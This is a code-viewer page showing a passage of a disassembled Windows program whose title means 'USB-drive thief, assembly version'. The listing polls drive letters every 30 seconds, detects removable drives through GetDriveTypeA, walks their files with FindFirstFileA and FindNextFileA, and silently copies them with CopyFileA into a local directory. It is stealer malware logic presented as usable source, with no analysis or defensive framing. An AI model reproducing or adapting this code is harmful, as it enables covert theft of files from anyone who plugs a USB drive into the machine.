📄 u盘小偷汇编版.txt
字号:
::00401253:: 6A 00 PUSH 0
::00401255:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040125B:: 50 PUSH EAX
::0040125C:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401262:: 50 PUSH EAX
::00401263:: E8 A2000000 CALL 0040130A \:JMPDOWN >>>: KERNEL32.DLL:CopyFileA
::00401268:: 8D85 BEFEFFFF LEA EAX,[EBP-142] \:BYJMP
::0040126E:: 50 PUSH EAX
::0040126F:: FF75 FC PUSH DWORD PTR [EBP-4]
::00401272:: E8 B7000000 CALL 0040132E \:JMPDOWN >>>: KERNEL32.DLL:FindNextFileA
::00401277:: 0BC0 OR EAX,EAX
::00401279:: 0F85 8AFEFFFF JNZ 00401109 \:JMPUP
::0040127F:: FF75 FC PUSH DWORD PTR [EBP-4]
::00401282:: E8 9B000000 CALL 00401322 \:JMPDOWN >>>: KERNEL32.DLL:FindClose
::00401287:: 61 POPAD \:BYJMP JmpBy:00401100,
::00401288:: C9 LEAVE
::00401289:: C2 0400 RETN 4
::0040128C:: 55 PUSH EBP \:BYCALL CallBy:004012E3,
::0040128D:: 8BEC MOV EBP,ESP
::0040128F:: 83C4 F4 ADD ESP,-C
::00401292:: EB 44 JMP SHORT 004012D8 \:JMPDOWN
::00401294:: 6A 0A PUSH A \:BYJMP JmpBy:004012DF,
::00401296:: 8D45 F6 LEA EAX,[EBP-A]
::00401299:: 50 PUSH EAX
::0040129A:: E8 A1000000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040129F:: 68 00304000 PUSH 403000 \->: C
::004012A4:: 8D45 F6 LEA EAX,[EBP-A]
::004012A7:: 50 PUSH EAX
::004012A8:: E8 9F000000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::004012AD:: 68 44204000 PUSH 402044 \->: :
::004012B2:: 8D45 F6 LEA EAX,[EBP-A]
::004012B5:: 50 PUSH EAX
::004012B6:: E8 91000000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::004012BB:: 8D45 F6 LEA EAX,[EBP-A]
::004012BE:: 50 PUSH EAX
::004012BF:: E8 70000000 CALL 00401334 \:JMPDOWN >>>: KERNEL32.DLL:GetDriveTypeA
::004012C4:: 83F8 02 CMP EAX,2
::004012C7:: 75 09 JNZ SHORT 004012D2 \:JMPDOWN
::004012C9:: 8D45 F6 LEA EAX,[EBP-A]
::004012CC:: 50 PUSH EAX
::004012CD:: E8 2EFDFFFF CALL 00401000 \:JMPUP
::004012D2:: FE05 00304000 INC BYTE PTR [403000] \:BYJMP JmpBy:004012C7,
::004012D8:: 803D 00304000 59 CMP BYTE PTR [403000],59 \:BYJMP JmpBy:00401292,
::004012DF:: 76 B3 JBE SHORT 00401294 \:JMPUP
::004012E1:: C9 LEAVE
::004012E2:: C3 RETN
::004012E3:: E8 A4FFFFFF CALL 0040128C \:JMPUP\:BYJMP JmpBy:004012F9,
::004012E8:: 68 30750000 PUSH 7530
::004012ED:: E8 54000000 CALL 00401346 \:JMPDOWN >>>: KERNEL32.DLL:Sleep
::004012F2:: C605 00304000 43 MOV BYTE PTR [403000],43
::004012F9:: EB E8 JMP SHORT 004012E3 \:JMPUP
::004012FB:: C3 RETN
::004012FC:: 6A 00 PUSH 0
::004012FE:: E8 19000000 CALL 0040131C \:JMPDOWN >>>: KERNEL32.DLL:ExitProcess
::00401303:: CC INT3
::00401304:: FF25 00204000 JMP [402000] \:BYCALL CallBy:0040119E,0040122C,0040124E, >>>: KERNEL32.DLL:关闭句柄
::0040130A:: FF25 04204000 JMP [402004] \:BYCALL CallBy:00401241,00401263, >>>: KERNEL32.DLL:CopyFileA
::00401310:: FF25 08204000 JMP [402008] \:BYCALL CallBy:004010E5,004011C5, >>>: KERNEL32.DLL:CreateDirectoryA
::00401316:: FF25 0C204000 JMP [40200C] \:BYCALL CallBy:0040116E,004011F1, >>>: KERNEL32.DLL:解密最喜欢看到的
::0040131C:: FF25 10204000 JMP [402010] \:BYCALL CallBy:004012FE, >>>: KERNEL32.DLL:ExitProcess
::00401322:: FF25 14204000 JMP [402014] \:BYCALL CallBy:00401282, >>>: KERNEL32.DLL:FindClose
::00401328:: FF25 18204000 JMP [402018] \:BYCALL CallBy:004010F8, >>>: KERNEL32.DLL:FindFirstFileA
::0040132E:: FF25 1C204000 JMP [40201C] \:BYCALL CallBy:00401272, >>>: KERNEL32.DLL:FindNextFileA
::00401334:: FF25 20204000 JMP [402020] \:BYCALL CallBy:004012BF, >>>: KERNEL32.DLL:GetDriveTypeA
::0040133A:: FF25 24204000 JMP [402024] \:BYCALL CallBy:0040118E,0040120D, >>>: KERNEL32.DLL:得到文件长度
::00401340:: FF25 28204000 JMP [402028] \:BYCALL >>>: KERNEL32.DLL:RtlZeroMemory
::00401346:: FF25 2C204000 JMP [40202C] \:BYCALL CallBy:004012ED, >>>: KERNEL32.DLL:Sleep
::0040134C:: FF25 30204000 JMP [402030] \:BYCALL >>>: KERNEL32.DLL:连接字符串
::00401352:: FF25 34204000 JMP [402034] \:BYCALL >>>: KERNEL32.DLL:拷贝字符串
::00401358:: FF25 38204000 JMP [402038] \:BYCALL CallBy:00401075, >>>: KERNEL32.DLL:得到字符串长度
::0040135E:: 0000 ADD [EAX],AL
::00401360:: 0000 ADD [EAX],AL
::00401362:: 0000 ADD [EAX],AL
::00401364:: 0000 ADD [EAX],AL
::00401366:: 0000 ADD [EAX],AL
::00401368:: 0000 ADD [EAX],AL
::0040136A:: 0000 ADD [EAX],AL
::0040136C:: 0000 ADD [EAX],AL
::0040136E:: 0000 ADD [EAX],AL
::00401370:: 0000 ADD [EAX],AL
::00401372:: 0000 ADD [EAX],AL
::00401374:: 0000 ADD [EAX],AL
::00401376:: 0000 ADD [EAX],AL
::00401378:: 0000 ADD [EAX],AL
::0040137A:: 0000 ADD [EAX],AL
::0040137C:: 0000 ADD [EAX],AL
::0040137E:: 0000 ADD [EAX],AL
::00401380:: 0000 ADD [EAX],AL
::00401382:: 0000 ADD [EAX],AL
::00401384:: 0000 ADD [EAX],AL
::00401386:: 0000 ADD [EAX],AL
::00401388:: 0000 ADD [EAX],AL
::0040138A:: 0000 ADD [EAX],AL
::0040138C:: 0000 ADD [EAX],AL
::0040138E:: 0000 ADD [EAX],AL
::00401390:: 0000 ADD [EAX],AL
::00401392:: 0000 ADD [EAX],AL
::00401394:: 0000 ADD [EAX],AL
::00401396:: 0000 ADD [EAX],AL
::00401398:: 0000 ADD [EAX],AL
::0040139A:: 0000 ADD [EAX],AL
::0040139C:: 0000 ADD [EAX],AL
::0040139E:: 0000 ADD [EAX],AL
::004013A0:: 0000 ADD [EAX],AL
::004013A2:: 0000 ADD [EAX],AL
::004013A4:: 0000 ADD [EAX],AL
::004013A6:: 0000 ADD [EAX],AL
::004013A8:: 0000 ADD [EAX],AL
::004013AA:: 0000 ADD [EAX],AL
::004013AC:: 0000 ADD [EAX],AL
::004013AE:: 0000 ADD [EAX],AL
::004013B0:: 0000 ADD [EAX],AL
::004013B2:: 0000 ADD [EAX],AL
::004013B4:: 0000 ADD [EAX],AL
::004013B6:: 0000 ADD [EAX],AL
::004013B8:: 0000 ADD [EAX],AL
::004013BA:: 0000 ADD [EAX],AL
::004013BC:: 0000 ADD [EAX],AL
::004013BE:: 0000 ADD [EAX],AL
::004013C0:: 0000 ADD [EAX],AL
::004013C2:: 0000 ADD [EAX],AL
::004013C4:: 0000 ADD [EAX],AL
::004013C6:: 0000 ADD [EAX],AL
::004013C8:: 0000 ADD [EAX],AL
::004013CA:: 0000 ADD [EAX],AL
::004013CC:: 0000 ADD [EAX],AL
::004013CE:: 0000 ADD [EAX],AL
::004013D0:: 0000 ADD [EAX],AL
::004013D2:: 0000 ADD [EAX],AL
::004013D4:: 0000 ADD [EAX],AL
::004013D6:: 0000 ADD [EAX],AL
::004013D8:: 0000 ADD [EAX],AL
::004013DA:: 0000 ADD [EAX],AL
::004013DC:: 0000 ADD [EAX],AL
::004013DE:: 0000 ADD [EAX],AL
::004013E0:: 0000 ADD [EAX],AL
::004013E2:: 0000 ADD [EAX],AL
::004013E4:: 0000 ADD [EAX],AL
::004013E6:: 0000 ADD [EAX],AL
::004013E8:: 0000 ADD [EAX],AL
::004013EA:: 0000 ADD [EAX],AL
::004013EC:: 0000 ADD [EAX],AL
::004013EE:: 0000 ADD [EAX],AL
::004013F0:: 0000 ADD [EAX],AL
::004013F2:: 0000 ADD [EAX],AL
::004013F4:: 0000 ADD [EAX],AL
::004013F6:: 0000 ADD [EAX],AL
::004013F8:: 0000 ADD [EAX],AL
::004013FA:: 0000 ADD [EAX],AL
::004013FC:: 0000 ADD [EAX],AL
::004013FE:: 0000 ADD [EAX],AL
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -